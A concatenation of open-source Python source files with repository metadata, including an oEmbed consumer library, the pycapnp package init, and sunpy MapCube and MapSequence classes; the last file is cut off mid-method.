response = json.loads(self.call('detect', **kwargs))
results = []
# TODO: WHY does this method return a list of lists? In what circumstances are both dimensions used?
for detections in response['data']['detections']:
results += [GLanguage(**language) for language in detections]
return results
def languages(self, **kwargs):
response = json.loads(self.call('languages', **kwargs))
results = [GLanguage(**language) for language in response['data']['languages']]
return results
| {
"repo_name": "drinks/pyglot",
"path": "pyglot.py",
"copies": "1",
"size": "3195",
"license": "bsd-3-clause",
"hash": -7063105025376513000,
"line_mean": 30.95,
"line_max": 108,
"alpha_frac": 0.59342723,
"autogenerated": false,
"ratio": 4.165580182529335,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5259007412529335,
"avg_score": null,
"num_lines": null
} |
'''A Python library that implements an OEmbed consumer to use with OEmbed providers.
Based on reference from http://oembed.com/
oEmbed is a format for allowing an embedded representation of a URL on
third party sites. The simple API allows a website to display embedded content
(such as photos or videos) when a user posts a link to that resource, without
having to parse the resource directly.
OEmbed format authors:
* Cal Henderson (cal [at] iamcal.com)
* Mike Malone (mike [at] pownce.com)
* Leah Culver (leah [at] pownce.com)
* Richard Crowley (r [at] rcrowley.org)
Simple usage:
import oembed
consumer = oembed.OEmbedConsumer()
endpoint = oembed.OEmbedEndpoint('http://www.flickr.com/services/oembed',
['http://*.flickr.com/*'])
consumer.addEndpoint(endpoint)
response = consumer.embed('http://www.flickr.com/photos/wizardbt/2584979382/')
print response['url']
import pprint
pprint.pprint(response.getData())
Copyright (c) 2008 Ariel Barmat, abarmat@gmail.com
Copyright (c) 2010 Mathijs de Bruin, drbob@dokterbob.net
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
'''
import urllib
import urllib2
import logging
import re
import simplejson
try:
from xml.etree import cElementTree as etree
except ImportError:
# Running Python < 2.4 so we need a different import
import cElementTree as etree
__author__ = 'drbob@dokterbob.net'
__version__ = '0.2'
class OEmbedError(Exception):
'''Base class for OEmbed errors'''
class OEmbedInvalidRequest(OEmbedError):
'''Raised when an invalid parameter is used in a request'''
class OEmbedNoEndpoint(OEmbedError):
'''Raised when no endpoint is available for a particular URL'''
class OEmbedResponse(object):
'''
Base class for all OEmbed responses.
This class provides a factory of OEmbed responses according to the format
detected in the type field. It also validates that mandatory fields are
present.
'''
def _validateData(self, data):
pass
def __getitem__(self, name):
return self._data.get(name)
def __iter__(self):
return self.iterkeys()
def iterkeys(self):
return self._data.iterkeys()
def getData(self):
return self._data
def loadData(self, data):
self._validateData(data)
self._data = data
@classmethod
def createLoad(cls, data):
if not data.has_key('type') or \
not data.has_key('version'):
raise OEmbedError('Missing required fields on OEmbed response.')
response = cls.create(data['type'])
response.loadData(data)
return response
@classmethod
def create(cls, responseType):
return resourceTypes.get(responseType, OEmbedResponse)()
@classmethod
def newFromJSON(cls, raw):
data = simplejson.loads(raw)
return cls.createLoad(data)
@classmethod
def newFromXML(cls, raw):
elem = etree.XML(raw)
data = dict([(e.tag, e.text) for e in elem.getiterator() \
if e.tag not in ['oembed']])
return cls.createLoad(data)
class OEmbedPhotoResponse(OEmbedResponse):
'''
This type is used for representing static photos.
'''
def _validateData(self, data):
OEmbedResponse._validateData(self, data)
if not data.has_key('url') or \
not data.has_key('width') or \
not data.has_key('height'):
raise OEmbedError('Missing required fields on OEmbed photo response.')
class OEmbedVideoResponse(OEmbedResponse):
'''
This type is used for representing playable videos.
'''
def _validateData(self, data):
OEmbedResponse._validateData(self, data)
if not data.has_key('html') or \
not data.has_key('width') or \
not data.has_key('height'):
raise OEmbedError('Missing required fields on OEmbed video response.')
class OEmbedLinkResponse(OEmbedResponse):
'''
Responses of this type allow a provider to return any generic embed data
(such as title and author_name), without providing either the url or html
parameters. The consumer may then link to the resource, using the URL
specified in the original request.
'''
class OEmbedRichResponse(OEmbedResponse):
'''
This type is used for rich HTML content that does not fall under
one of the other categories.
'''
def _validateData(self, data):
OEmbedResponse._validateData(self, data)
if not data.has_key('html') or \
not data.has_key('width') or \
not data.has_key('height'):
raise OEmbedError('Missing required fields on OEmbed rich response.')
resourceTypes = {
'photo': OEmbedPhotoResponse,
'video': OEmbedVideoResponse,
'link': OEmbedLinkResponse,
'rich': OEmbedRichResponse
}
class OEmbedEndpoint(object):
'''
A class representing an OEmbed Endpoint exposed by a provider.
This class handles a number of URL schemes and manage resource retrieval.
'''
def __init__(self, url, urlSchemes=None):
'''
Create a new OEmbedEndpoint object.
Args:
url: The url of a provider API (API endpoint).
urlSchemes: A list of URL schemes for this endpoint.
'''
self._urlApi = url
self._urlSchemes = {}
self._initRequestHeaders()
self._urllib = urllib2
if urlSchemes is not None:
map(self.addUrlScheme, urlSchemes)
self._implicitFormat = self._urlApi.find('{format}') != -1
def _initRequestHeaders(self):
self._requestHeaders = {}
self.setUserAgent('python-oembed/' + __version__)
def addUrlScheme(self, url):
'''
Add a url scheme to this endpoint. It takes a url string and create
the OEmbedUrlScheme object internally.
Args:
url: The url string that represents a url scheme to add.
'''
#@todo: validate invalid url format according to http://oembed.com/
if not isinstance(url, str):
raise TypeError('url must be a string value')
if not self._urlSchemes.has_key(url):
self._urlSchemes[url] = OEmbedUrlScheme(url)
def delUrlScheme(self, url):
'''
Remove an OEmbedUrlScheme from the list of schemes.
Args:
url: The url used as key for the urlSchems dict.
'''
if self._urlSchemes.has_key(url):
del self._urlSchemes[url]
def clearUrlSchemes(self):
'''Clear the schemes in this endpoint.'''
self._urlSchemes.clear()
def getUrlSchemes(self):
'''
Get the url schemes in this endpoint.
Returns:
A dict of OEmbedUrlScheme objects. k => url, v => OEmbedUrlScheme
'''
return self._urlSchemes
def match(self, url):
'''
Try to find if url matches against any of the schemes within this
endpoint.
Args:
url: The url to match against each scheme
Returns:
True if a matching scheme was found for the url, False otherwise
'''
for urlScheme in self._urlSchemes.itervalues():
if urlScheme.match(url):
return True
return False
def request(self, url, **opt):
'''
Format the input url and optional parameters, and provides the final url
where to get the given resource.
Args:
url: The url of an OEmbed resource.
**opt: Parameters passed to the url.
Returns:
The complete url of the endpoint and resource.
'''
params = opt
params['url'] = url
urlApi = self._urlApi
if params.has_key('format') and self._implicitFormat:
urlApi = self._urlApi.replace('{format}', params['format'])
del params['format']
return "%s?%s" % (urlApi, urllib.urlencode(params))
def get(self, url, **opt):
'''
Convert the resource url to a complete url and then fetch the
data from it.
Args:
url: The url of an OEmbed resource.
**opt: Parameters passed to the url.
Returns:
OEmbedResponse object according to data fetched
'''
return self.fetch(self.request(url, **opt))
def fetch(self, url):
'''
Fetch url and create a response object according to the mime-type.
Args:
url: The url to fetch data from
Returns:
OEmbedResponse object according to data fetched
'''
opener = self._urllib.build_opener()
opener.addheaders = self._requestHeaders.items()
response = opener.open(url)
headers = response.info()
raw = response.read()
if not headers.has_key('Content-Type'):
raise OEmbedError('Missing mime-type in response')
if headers['Content-Type'].find('application/xml') != -1 or \
headers['Content-Type'].find('text/xml') != -1:
response = OEmbedResponse.newFromXML(raw)
elif headers['Content-Type'].find('application/json') != -1 or \
headers['Content-Type'].find('text/json') != -1 or \
headers['Content-Type'].find('application/x-json') != -1:
response = OEmbedResponse.newFromJSON(raw)
else:
raise OEmbedError('Invalid mime-type in response - %s' % \
headers['Content-Type'])
return response
def setUrllib(self, urllib):
'''
Override the default urllib implementation.
Args:
urllib: an instance that supports the same API as the urllib2 module
'''
self._urllib = urllib
def setUserAgent(self, user_agent):
'''
Override the default user agent
Args:
user_agent: a string that should be send to the server as the User-agent
'''
self._requestHeaders['User-Agent'] = user_agent
class OEmbedAutoDiscovery(OEmbedEndpoint):
def __init__(self):
self._urllib = urllib2
self._initRequestHeaders()
def request(self, url, **opt):
'''
Format the input url and optional parameters, and provides the final url
where to get the given resource.
Args:
url: The url of an OEmbed resource.
**opt: Parameters passed to the url.
Returns:
The complete url of the endpoint and resource.
'''
params = opt
urlApi = self.discover(url)
if not urlApi:
raise OEmbedError('No OEmbed URL could be discovered for %s' % url)
if params.has_key('format') and self._implicitFormat:
urlApi = self._urlApi.replace('{format}', params['format'])
del params['format']
return "%s&%s" % (urlApi, urllib.urlencode(params))
def discover(self, url, format=None):
from scrape import Session
s = Session(agent='Banana King')
r = s.go(url)
head = r.first('head', enders='/head')
if not format or (format == 'json'):
try:
tag = head.firsttag('link', type='application/json+oembed')
return tag['href']
except Exception:
pass
if not format or (format == 'xml'):
try:
head.firsttag('link', type='application/xml+oembed')
return tag['href']
except Exception:
pass
return None
class OEmbedUrlScheme(object):
'''
A class representing an OEmbed URL schema.
'''
def __init__(self, url):
'''
Create a new OEmbedUrlScheme instanace.
Args;
url: The url scheme. It also takes the wildcard character (*).
'''
self._url = url
self._regex = re.compile(url.replace('.', '\.')\
.replace('*', '.*'))
def getUrl(self):
'''
Get the url scheme.
Returns:
The url scheme.
'''
return self._url
def match(self, url):
'''
Match the url against this scheme.
Args:
url: The url to match against this scheme.
Returns:
True if a match was found for the url, False otherwise
'''
return self._regex.match(url) is not None
def __repr__(self):
return "%s - %s" % (object.__repr__(self), self._url)
class OEmbedConsumer(object):
'''
A class representing an OEmbed consumer.
This class manages a number of endpoints, selects the corresponding one
according to the resource url passed to the embed function and fetches
the data.
'''
def __init__(self):
self._endpoints = []
def addEndpoint(self, endpoint):
'''
Add a new OEmbedEndpoint to be manage by the consumer.
Args:
endpoint: An instance of an OEmbedEndpoint class.
'''
self._endpoints.append(endpoint)
def delEndpoint(self, endpoint):
'''
Remove an OEmbedEnpoint from this consumer.
Args:
endpoint: An instance of an OEmbedEndpoint class.
'''
self._endpoints.remove(endpoint)
def clearEndpoints(self):
'''Clear all the endpoints managed by this consumer.'''
del self._endpoints[:]
def getEndpoints(self):
'''
Get the list of endpoints.
Returns:
The list of endpoints in this consumer.
'''
return self._endpoints
def _endpointFor(self, url):
for endpoint in self._endpoints:
if endpoint.match(url):
return endpoint
return None
def _request(self, url, **opt):
endpoint = self._endpointFor(url)
if endpoint is None:
logging.debug('No endpoint found for %s, attempting auto-discovery.' % url)
return OEmbedAutoDiscovery().get(url, **opt)
raise OEmbedNoEndpoint('There are no endpoints available for \'%s\' and autodiscovery failed.'\
% url)
return endpoint.get(url, **opt)
def embed(self, url, format='json', **opt):
'''
Get an OEmbedResponse from one of the providers configured in this
consumer according to the resource url.
Args:
url: The url of the resource to get.
format: Desired response format.
**opt: Optional parameters to pass in the url to the provider.
Returns:
OEmbedResponse object.
'''
if format not in ['json', 'xml']:
raise OEmbedInvalidRequest('Format must be json or xml')
opt['format'] = format
return self._request(url, **opt)
"""
>>> r = DefaultOEmbedConsumer.embed('http://www.flickr.com/photos/14950906@N07/3501945280/')
>>> r['author_name']
'gicol'
>>> r['url']
'http://farm4.static.flickr.com/3582/3501945280_fa47a316b1.jpg'
"""
DefaultOEmbedConsumer = OEmbedConsumer()
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.youtube.com/oembed',
['http://www.youtube.com/watch*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.flickr.com/services/oembed',
['http://*.flickr.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://revision3.com/api/oembed/',
['http://*.revision3.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.hulu.com/api/oembed.{format}',
['http://www.hulu.com/watch/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.vimeo.com/api/oembed.{format}',
['http://www.vimeo.com/*',
'http://vimeo.com/*',
'http://www.vimeo.com/groups/*/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://lab.viddler.com/services/oembed/',
['http://*.viddler.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.scribd.com/services/oembed',
['http://*.scribd.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://qik.com/api/oembed.{format}',
['http://qik.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.dailymotion.com/api/oembed',
['http://www.dailymotion.com/*']))
| {
"repo_name": "dokterbob/python-oembed",
"path": "oembed.py",
"copies": "1",
"size": "18684",
"license": "mit",
"hash": 9131043426459385000,
"line_mean": 29.1841680129,
"line_max": 108,
"alpha_frac": 0.5730036395,
"autogenerated": false,
"ratio": 4.433792121499763,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5506795760999763,
"avg_score": null,
"num_lines": null
} |
"""A python library wrapping the Cap'n Proto C++ library
Example Usage::
import capnp
addressbook = capnp.load('addressbook.capnp')
# Building
addresses = addressbook.AddressBook.newMessage()
people = addresses.init('people', 1)
alice = people[0]
alice.id = 123
alice.name = 'Alice'
alice.email = 'alice@example.com'
alicePhone = alice.init('phones', 1)[0]
alicePhone.type = 'mobile'
f = open('example.bin', 'w')
addresses.write(f)
f.close()
# Reading
f = open('example.bin')
addresses = addressbook.AddressBook.read(f)
for person in addresses.people:
print(person.name, ':', person.email)
for phone in person.phones:
print(phone.type, ':', phone.number)
"""
# flake8: noqa F401 F403 F405
from .version import version as __version__
from .lib.capnp import *
from .lib.capnp import (
_CapabilityClient,
_DynamicCapabilityClient,
_DynamicListBuilder,
_DynamicListReader,
_DynamicOrphan,
_DynamicResizableListBuilder,
_DynamicStructBuilder,
_DynamicStructReader,
_EventLoop,
_InterfaceModule,
_ListSchema,
_MallocMessageBuilder,
_PackedFdMessageReader,
_StreamFdMessageReader,
_StructModule,
_write_message_to_fd,
_write_packed_message_to_fd,
_Promise as Promise,
_init_capnp_api,
)
_init_capnp_api()
add_import_hook() # enable import hook by default
| {
"repo_name": "jparyani/pycapnp",
"path": "capnp/__init__.py",
"copies": "1",
"size": "1434",
"license": "bsd-2-clause",
"hash": -3096686618089659400,
"line_mean": 22.9,
"line_max": 56,
"alpha_frac": 0.659693166,
"autogenerated": false,
"ratio": 3.4388489208633093,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4598542086863309,
"avg_score": null,
"num_lines": null
} |
"""A Python MapCube Object"""
from __future__ import absolute_import
#pylint: disable=W0401,W0614,W0201,W0212,W0404
__author__ = "Keith Hughitt"
__email__ = "keith.hughitt@nasa.gov"
from sunpy.map import Map
from sunpy.map.sources import *
import numpy as np
#
# 2011/04/13: Should Map be broken up into Map and MapHeader classes? This way
# mapped header values can be used in MapCube without having to keep extra
# copies of the data..
#
class MapCube(np.ndarray):
"""
MapCube(input)
A spatially-aware data array based on the SolarSoft Map object.
Reads in the files at the specified location, stores their headers, and
creates a 3d array from their contents.
Parameters
----------
args : {string | Map}*
Map instances or filepaths from which MapCube should be built.
sortby : {"date"}
Method by which the MapCube should be sorted along the z-axis.
Attributes
----------
headers : list
a list of dictionaries containing the original and normalized header tags for the files used to build the MapCube.
See Also
--------
numpy.ndarray Parent class for the MapCube object
:class:`sunpy.map.Map`
Examples
--------
>>> mapcube = sunpy.make_map('images/')
>>> mapcube[0].show()
>>> mapcube[3].reference_pixel['x']
2050.6599120000001
"""
def __new__(cls, *args, **kwargs):
"""Creates a new Map instance"""
maps = []
data = []
headers = []
# convert input to maps
for item in args:
if isinstance(item, Map):
maps.append(item)
else:
maps.append(Map.read(item))
# sort data
sortby = kwargs.get("sortby", "date")
if hasattr(cls, '_sort_by_%s' % sortby):
maps.sort(key=getattr(cls, '_sort_by_%s' % sortby)())
# create data cube
for map_ in maps:
data.append(np.array(map_))
headers.append(map_._original_header)
obj = np.asarray(data).view(cls)
obj._headers = headers
return obj
#pylint: disable=W0613,E1101
def __init__(self, *args, **kwargs):
coalign = kwargs.get("coalign", False)
derotate = kwargs.get("derotate", False)
# Coalignment
if coalign and hasattr(self, '_coalign_%s' % coalign):
getattr(self, '_coalign_%s' % coalign)()
if derotate:
self._derotate()
def __array_finalize__(self, obj):
"""Finishes instantiation of the new MapCube object"""
if obj is None:
return
if hasattr(obj, '_headers'):
self._headers = obj._headers
def __array_wrap__(self, out_arr, context=None):
"""Returns a wrapped instance of a MapCube object"""
return np.ndarray.__array_wrap__(self, out_arr, context)
def __getitem__(self, key):
"""Overiding indexing operation"""
if self.ndim is 3 and isinstance(key, int):
data = np.ndarray.__getitem__(self, key)
header = self._headers[key]
for cls in Map.__subclasses__():
if cls.is_datasource_for(header):
return cls(data, header)
else:
return np.ndarray.__getitem__(self, key)
def std(self, *args, **kwargs):
"""overide np.ndarray.std()"""
return np.array(self, copy=False, subok=False).std(*args, **kwargs)
# Coalignment methods
def _coalign_diff(self):
"""Difference-based coalignment
Coaligns data by minimizing the difference between subsequent images
before and after shifting the images one to several pixels in each
direction.
pseudo-code:
for i len(self):
min_diff = {'value': (), 'offset': (0, 0)} # () is pos infinity
# try shifting 1 pixel in each direction
for x in (-1, 0, 1):
for y in (-1, 0, 1):
# calculate difference for intersecting pixels
# if < min_diff['value'], store new value/offset
# shift image
if min_diff['offset'] != (0, 0):
# shift and clip image
"""
pass
# Sorting methods
@classmethod
def _sort_by_date(cls):
return lambda m: m.date # maps.sort(key=attrgetter('date'))
def _derotate(self):
"""Derotates the layers in the MapCube"""
pass
def plot(self):
"""A basic plot method (not yet implemented)"""
pass
| {
"repo_name": "jslhs/sunpy",
"path": "sunpy/map/mapcube.py",
"copies": "1",
"size": "4703",
"license": "bsd-2-clause",
"hash": -4326517363876252700,
"line_mean": 29.3419354839,
"line_max": 122,
"alpha_frac": 0.5526259834,
"autogenerated": false,
"ratio": 4.12182296231376,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.517444894571376,
"avg_score": null,
"num_lines": null
} |
"""A Python MapCube Object"""
from __future__ import absolute_import
#pylint: disable=W0401,W0614,W0201,W0212,W0404
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from copy import copy
from sunpy.map import Map
from sunpy.map.sources import *
from sunpy.util import plotting
__all__ = ['MapCube']
# (https://github.com/sunpy/sunpy/issues/397)
# 2011/04/13: Should Map be broken up into Map and MapHeader classes? This way
# mapped header values can be used in MapCube without having to keep extra
# copies of the data..
#
class MapCube(np.ndarray):
"""
MapCube(input)
A spatially-aware data array based on the SolarSoft Map object.
Reads in the files at the specified location, stores their headers, and
creates a 3d array from their contents.
Parameters
----------
args : {string | Map}*
Map instances or filepaths from which MapCube should be built.
sortby : {"date"}
Method by which the MapCube should be sorted along the z-axis.
Attributes
----------
headers : list
a list of dictionaries containing the original and normalized header tags for the files used to build the MapCube.
See Also
--------
numpy.ndarray Parent class for the MapCube object
:class:`sunpy.map.Map`
Examples
--------
>>> mapcube = sunpy.make_map('images/')
>>> mapcube[0].show()
>>> mapcube[3].reference_pixel['x']
2050.6599120000001
"""
def __new__(cls, *args, **kwargs):
"""Creates a new Map instance"""
maps = []
data = []
headers = []
# convert input to maps
for item in args:
if isinstance(item, Map):
maps.append(item)
else:
maps.append(Map.read(item))
# sort data
sortby = kwargs.get("sortby", "date")
if hasattr(cls, '_sort_by_%s' % sortby):
maps.sort(key=getattr(cls, '_sort_by_%s' % sortby)())
# create data cube
for map_ in maps:
data.append(np.array(map_))
headers.append(map_._original_header)
obj = np.asarray(data).view(cls)
obj._headers = headers
return obj
#pylint: disable=W0613,E1101
def __init__(self, *args, **kwargs):
coalign = kwargs.get("coalign", False)
derotate = kwargs.get("derotate", False)
# Coalignment
if coalign and hasattr(self, '_coalign_%s' % coalign):
getattr(self, '_coalign_%s' % coalign)()
if derotate:
self._derotate()
def __array_finalize__(self, obj):
"""Finishes instantiation of the new MapCube object"""
if obj is None:
return
if hasattr(obj, '_headers'):
self._headers = obj._headers
def __array_wrap__(self, out_arr, context=None):
"""Returns a wrapped instance of a MapCube object"""
return np.ndarray.__array_wrap__(self, out_arr, context)
def __getitem__(self, key):
"""Overiding indexing operation"""
if self.ndim is 3 and isinstance(key, int):
data = np.ndarray.__getitem__(self, key)
header = self._headers[key]
for cls in Map.__subclasses__():
if cls.is_datasource_for(header):
return cls(data, header)
else:
return np.ndarray.__getitem__(self, key)
def std(self, *args, **kwargs):
"""overide np.ndarray.std()"""
return np.array(self, copy=False, subok=False).std(*args, **kwargs)
# Coalignment methods
def _coalign_diff(self):
"""Difference-based coalignment
Coaligns data by minimizing the difference between subsequent images
before and after shifting the images one to several pixels in each
direction.
pseudo-code:
for i len(self):
min_diff = {'value': (), 'offset': (0, 0)} # () is pos infinity
# try shifting 1 pixel in each direction
for x in (-1, 0, 1):
for y in (-1, 0, 1):
# calculate difference for intersecting pixels
# if < min_diff['value'], store new value/offset
# shift image
if min_diff['offset'] != (0, 0):
# shift and clip image
"""
pass
# Sorting methods
@classmethod
def _sort_by_date(cls):
return lambda m: m.date # maps.sort(key=attrgetter('date'))
def _derotate(self):
"""Derotates the layers in the MapCube"""
pass
def plot(self, gamma=None, annotate=True, axes=None, controls=True,
interval=200, resample=False, colorbar=False,
**ani_args):
"""
A animation plotting routine that animates each element in the
MapCube
Parameters
----------
gamma: float
Gamma value to use for the color map
annotate: bool
If true, the data is plotted at it's natural scale; with
title and axis labels.
axes: matplotlib.axes object or None
If provided the image will be plotted on the given axes. Else the
current matplotlib axes will be used.
controls: bool
Adds play / pause button to the animation
interval: int
Frame display time in ms.
resample: list or False
Draws the map at a lower resolution to increase the speed of
animation. Specify a list as a fraction i.e. [0.25, 0.25] to
plot at 1/4 resolution.
colorbar: bool
Draw a colorbar on the plot.
**ani_args : dict
Any additional imshow arguments that should be used
when plotting the image. Passed to
sunpy.util.plotting.ControlFuncAnimation
Examples
--------
cube = MapCube(*maps)
ani = cube.plot(colorbar=True)
plt.show()
#Plot the map at 1/2 original resolution.
cube = MapCube(*maps)
ani = cube.plot(resample=[0.5, 0.5], colorbar=True)
plt.show()
"""
if not axes:
axes = plt.gca()
fig = axes.get_figure()
# Normal plot
if annotate:
axes.set_title("%s %s" % (self[0].name, self[0].date))
# x-axis label
if self[0].coordinate_system['x'] == 'HG':
xlabel = 'Longitude [%s]' % self[0].units['x']
else:
xlabel = 'X-position [%s]' % self[0].units['x']
# y-axis label
if self[0].coordinate_system['y'] == 'HG':
ylabel = 'Latitude [%s]' % self[0].units['y']
else:
ylabel = 'Y-position [%s]' % self[0].units['y']
axes.set_xlabel(xlabel)
axes.set_ylabel(ylabel)
# Determine extent
extent = self[0].xrange + self[0].yrange
cmap = copy(self[0].cmap)
if gamma is not None:
cmap.set_gamma(gamma)
#make imshow kwargs a dict
kwargs = {'origin':'lower',
'cmap':cmap,
'norm':self[0].norm(),
'extent':extent,
'interpolation':'nearest'}
kwargs.update(ani_args)
im = axes.imshow(self[0], **kwargs)
#Set current image (makes colorbar work)
plt.sci(im)
divider = make_axes_locatable(axes)
cax = divider.append_axes("right", size="5%", pad=0.2)
cbar = plt.colorbar(im,cax)
if resample:
resample = np.array(self.shape[1:]) * np.array(resample)
ani_data = [x.resample(resample) for x in self]
else:
ani_data = self
def updatefig(i, *args):
im = args[0]
im.set_array(args[2][i])
im.set_cmap(self[i].cmap)
im.set_norm(self[i].norm())
if args[1]:
axes.set_title("%s %s" % (self[i].name, self[i].date))
ani = plotting.ControlFuncAnimation(fig, updatefig,
frames=xrange(0,self.shape[0]),
fargs=[im,annotate,ani_data],
interval=interval,
blit=False,**ani_args)
if controls:
axes, bax1, bax2, bax3 = plotting.add_controls(axes=axes)
bax1._button.on_clicked(ani._start)
bax2._button.on_clicked(ani._stop)
bax3._button.on_clicked(ani._step)
return ani
| {
"repo_name": "mjm159/sunpy",
"path": "sunpy/map/mapcube.py",
"copies": "1",
"size": "9043",
"license": "bsd-2-clause",
"hash": -2312816624538916000,
"line_mean": 31.0673758865,
"line_max": 122,
"alpha_frac": 0.5195178591,
"autogenerated": false,
"ratio": 4.1962877030162415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5215805562116241,
"avg_score": null,
"num_lines": null
} |
"""A Python MapSequence Object"""
#pylint: disable=W0401,W0614,W0201,W0212,W0404
from copy import deepcopy
import numpy as np
import matplotlib.animation
import numpy.ma as ma
import astropy.units as u
from sunpy.map import GenericMap
from sunpy.visualization.animator.mapsequenceanimator import MapSequenceAnimator
from sunpy.visualization import wcsaxes_compat
from sunpy.visualization import axis_labels_from_ctype
from sunpy.util import expand_list
__all__ = ['MapSequence']
class MapSequence(object):
"""
MapSequence
A series of Maps in a single object.
Parameters
----------
args : `list`
A list of Map instances
sortby : `datetime.datetime`
Method by which the MapSequence should be sorted along the z-axis.
derotate : `bool`
Apply a derotation to the data. Default to False.
To coalign a mapsequence so that solar features remain on the same pixels,
please see the "Coalignment of MapSequences" note below.
Attributes
----------
maps : `list`
This attribute holds the list of Map instances obtained from parameter args.
Examples
--------
>>> import sunpy.map
>>> mapsequence = sunpy.map.Map('images/*.fits', sequence=True) # doctest: +SKIP
MapSequences can be co-aligned using the routines in sunpy.image.coalignment.
"""
def __init__(self, *args, sortby='date', derotate=False, **kwargs):
"""Creates a new Map instance"""
self.maps = expand_list(args)
for m in self.maps:
if not isinstance(m, GenericMap):
raise ValueError('MapSequence expects pre-constructed map objects.')
# Optionally sort data
if sortby is not None:
if sortby == 'date':
self.maps.sort(key=self._sort_by_date())
else:
raise ValueError("Only sort by date is supported")
if derotate:
self._derotate()
def __getitem__(self, key):
"""Overriding indexing operation. If the key results in a single map,
then a map object is returned. This allows functions like enumerate to
work. Otherwise, a mapsequence is returned."""
if isinstance(self.maps[key], GenericMap):
return self.maps[key]
else:
return MapSequence(self.maps[key])
def __len__(self):
"""Return the number of maps in a mapsequence."""
return len(self.maps)
# Sorting methods
@classmethod
def _sort_by_date(cls):
return lambda m: m.date # maps.sort(key=attrgetter('date'))
def _derotate(self):
"""Derotates the layers in the MapSequence"""
pass
def plot(self, axes=None, resample=None, annotate=True,
interval=200, plot_function=None, **kwargs):
"""
A animation plotting routine that animates each element in the
MapSequence
Parameters
----------
axes: mpl axes
axes to plot the animation on, if none uses current axes
resample: list or False
Draws the map at a lower resolution to increase the speed of
animation. Specify a list as a fraction i.e. [0.25, 0.25] to
plot at 1/4 resolution.
[Note: this will only work where the map arrays are the same size]
annotate: bool
Annotate the figure with scale and titles
interval: int
Animation interval in ms
plot_function : function
A function to be called as each map is plotted. Any variables
returned from the function will have their ``remove()`` method called
at the start of the next frame so that they are removed from the plot.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> import matplotlib.animation as animation
>>> from sunpy.map import Map
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.plot(colorbar=True) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
Plot the map at 1/2 original resolution
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.plot(resample=[0.5, 0.5], colorbar=True) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
Save an animation of the MapSequence
>>> sequence = Map(res, sequence=True) # doctest: +SKIP
>>> ani = sequence.plot() # doctest: +SKIP
>>> Writer = animation.writers['ffmpeg'] # doctest: +SKIP
>>> writer = Writer(fps=10, metadata=dict(artist='SunPy'), bitrate=1800) # doctest: +SKIP
>>> ani.save('mapsequence_animation.mp4', writer=writer) # doctest: +SKIP
Save an animation with the limb at each time step
>>> def myplot(fig, ax, sunpy_map):
... p = sunpy_map.draw_limb()
... return p
>>> sequence = Map(files, sequence=True) # doctest: +SKIP
>>> ani = sequence.peek(plot_function=myplot) # doctest: +SKIP
>>> plt.show() # doctest: +SKIP
"""
if not axes:
axes = wcsaxes_compat.gca_wcs(self.maps[0].wcs)
fig = axes.get_figure()
if not plot_function:
plot_function = lambda fig, ax, smap: []
removes = []
# Normal plot
def annotate_frame(i):
axes.set_title("{s.name}".format(s=self[i]))
axes.set_xlabel(axis_labels_from_ctype(self[i].coordinate_system[0],
self[i].spatial_units[0]))
axes.set_ylabel(axis_labels_from_ctype(self[i].coordinate_system[1],
self[i].spatial_units[1]))
if resample:
if self.all_maps_same_shape():
resample = u.Quantity(self.maps[0].dimensions) * np.array(resample)
ani_data = [amap.resample(resample) for amap in self.maps]
else:
raise ValueError('Maps in mapsequence do not all have the same shape.')
else:
ani_data = self.maps
im = ani_data[0].plot(axes=axes, **kwargs)
def updatefig(i, im, annotate, ani_data, removes):
while removes:
removes.pop(0).remove()
im.set_array(ani_data[i].data)
im.set_cmap(ani_data[i].plot_settings['cmap'])
norm = deepcopy(ani_data[i].plot_settings['norm'])
# The following explicit call is for bugged versions of Astropy's
# ImageNormalize
norm.autoscale_None(ani_data[i].data)
im.set_norm(norm)
if wcsaxes_compat.is_wcsaxes(axes):
im.axes.reset_wcs(ani_data[i].wcs)
wcsaxes_compat.default_wcs_grid(axes)
else:
bl = ani_data[i]._get_lon_lat(ani_data[i].bottom_left_coord)
tr = ani_data[i]._get_lon_lat(ani_data[i].top_right_coord)
x_range = list(u.Quantity([bl[0], tr[0]]).to(ani_data[i].spatial_units[0]).value)
